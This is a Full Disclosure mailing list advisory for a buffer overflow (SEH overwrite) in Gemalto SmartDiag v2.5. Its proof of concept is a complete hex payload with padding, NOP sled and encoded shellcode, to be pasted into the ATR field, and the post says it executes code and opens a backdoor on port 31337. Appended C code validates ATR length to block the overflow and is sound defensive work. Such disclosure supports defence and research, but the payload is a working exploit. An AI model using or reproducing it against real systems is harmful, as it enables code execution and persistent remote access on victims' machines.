Full Disclosure mailing list archives
Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution
From: Majid Alqabandi <majid () q8-host com>
Date: Tue, 9 May 2017 22:48:39 +0300
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
# Vendor Notified: 17-04-2016

1. Description

SmartDiag.exe is vulnerable to a buffer overflow (SEH overwrite). When trying to "Register a new card", the input fields are vulnerable to a stack overflow attack which leads to code execution and other possible security threats.

2. Proof of Concept

The following PoC code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.

To exploit, start the SmartDiag.exe tool, choose "Register a new card", and in the ATR field use the following payload (tested on Win7x64 & Win8x64 - SmartDiag v2.5):

528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834
00052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834
000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000572b0410477f40008c214100f494400041ed40003b4140003552011078ab0110010000009cf2021000100000328b031040000000d02203100120400026e6400090909090e2f5001090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc3158140358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec47604506d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf5530d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bdc7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c538f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

3. Solution

The vendor has been informed and has confirmed the issue; no fix is available yet from the vendor.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
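The root cause described in the post is an ATR input field whose contents are copied into a fixed stack buffer without a length check. The block below is an added, illustrative example and not Gemalto's code or anything from the post: it decodes a hex ATR string the way a hardened "Register a new card" handler could, rejecting malformed or oversized input before any byte is written. It assumes the ISO/IEC 7816-3 bound of 33 bytes for an ATR (the same limit PC/SC uses for MAX_ATR_SIZE), so any input longer than 66 hex characters, including the multi-kilobyte payload above, is refused up front. The sample ATR value and the function names are constructed here.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* ISO/IEC 7816-3 bounds an Answer To Reset at 33 bytes (TS plus up to 32 more). */
#define ATR_MAX_BYTES 33

static int hex_nibble(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode a hex ATR string into out[]. Returns the decoded byte count, or -1 if the
 * input is empty, odd-length, non-hex, or would not fit. The length test runs
 * BEFORE the copy loop, which is the check a vulnerable handler lacks. */
int parse_atr_hex(const char *hex, unsigned char *out, size_t out_cap) {
    if (hex == NULL || out == NULL) return -1;
    size_t n = strlen(hex);
    if (n == 0 || (n % 2) != 0) return -1;                    /* whole bytes only */
    size_t bytes = n / 2;
    if (bytes > ATR_MAX_BYTES || bytes > out_cap) return -1;  /* reject, never truncate */
    for (size_t i = 0; i < bytes; i++) {
        int hi = hex_nibble(hex[2 * i]);
        int lo = hex_nibble(hex[2 * i + 1]);
        if (hi < 0 || lo < 0) return -1;
        out[i] = (unsigned char)((hi << 4) | lo);
    }
    return (int)bytes;
}

/* Hypothetical form handler: decoded length on success, -1 when the field is rejected. */
int atr_field_length(const char *field_text) {
    unsigned char atr[ATR_MAX_BYTES];  /* fixed stack buffer, sized to the spec limit */
    return parse_atr_hex(field_text, atr, sizeof atr);
}

/* Hypothetical accept/reject decision for the field: 1 accepted, 0 rejected. */
int atr_field_accept(const char *field_text) {
    return atr_field_length(field_text) > 0;
}

/* Constructed oversized input in the style of the post's payload (the 4-byte
 * address pattern repeated far past 33 bytes); returns 1 if it is rejected. */
int oversized_atr_rejected(void) {
    static char big[4096];
    size_t pos = 0;
    while (pos + 8 < sizeof big - 1) {
        memcpy(big + pos, "52834000", 8);
        pos += 8;
    }
    big[pos] = '\0';
    return atr_field_accept(big) == 0;
}

/* Boundary check: exactly 33 bytes (66 hex chars) is accepted, 34 bytes is not. */
int atr_boundary_ok(void) {
    char s[2 * (ATR_MAX_BYTES + 1) + 1];
    memset(s, '0', sizeof s - 1);
    s[2 * ATR_MAX_BYTES] = '\0';            /* 66 chars -> 33 bytes */
    int accept33 = atr_field_accept(s);
    s[2 * ATR_MAX_BYTES] = '0';
    s[2 * (ATR_MAX_BYTES + 1)] = '\0';      /* 68 chars -> 34 bytes */
    int accept34 = atr_field_accept(s);
    return accept33 == 1 && accept34 == 0;
}

int main(void) {
    /* Constructed 20-byte sample ATR, not taken from the post. */
    const char *sample = "3B8F8001804F0CA000000306030001000000006A";
    printf("sample ATR: %d bytes; oversized input rejected: %s; boundary ok: %s\n",
           atr_field_length(sample),
           oversized_atr_rejected() ? "yes" : "no",
           atr_boundary_ok() ? "yes" : "no");
    return 0;
}
```

The design point is that the handler rejects rather than truncates: silently cutting an over-long ATR to 33 bytes would still hide a malformed input from the operator, whereas an explicit error on length, parity and character class is also a useful log signal for anyone watching for this class of abuse against the tool.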